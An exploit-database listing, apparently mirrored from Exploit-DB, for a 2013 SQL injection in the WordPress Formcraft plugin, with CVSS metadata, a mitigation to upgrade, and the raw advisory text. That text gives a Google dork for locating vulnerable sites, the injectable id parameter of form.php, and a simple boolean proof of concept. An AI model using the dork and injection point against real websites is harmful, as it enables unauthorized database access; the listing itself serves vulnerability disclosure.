header-logo
Suggest Exploit
vendor:
Formcraft Plugin
by:
Ashiyane Digital Security Team
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Formcraft Plugin
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2013

WordPress formcraft Plugin Sql Injection

A SQL injection vulnerability exists in the formcraft plugin for Wordpress. An attacker can send a specially crafted request to the form.php script with an SQL payload in the id parameter to execute arbitrary SQL commands.

Mitigation:

Upgrade to the latest version of the formcraft plugin.
Source

Exploit-DB raw data:

#######################################################################
# Exploit Title : Wordpress formcraft Plugin Sql Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork : inurl:/wp-content/plugins/formcraft
#
# Software Link : www.wordpress.org
#
# Tested on: Windows , Linux
#
# Date: 2013/12/2
#
#############################################
# Exploit : Sql Injection
#
# Location1:
[Target]/wp-content/plugins/formcraft/form.php?id=[Sql]
#
#
#
# Exploit-DB Note:
# A PoC: form.php?id=1%20and%20 1=1
##########################################

##############
Milad Hacking

We Love Mohammad
##############

Navigation

Suggest Exploit

Services By CQR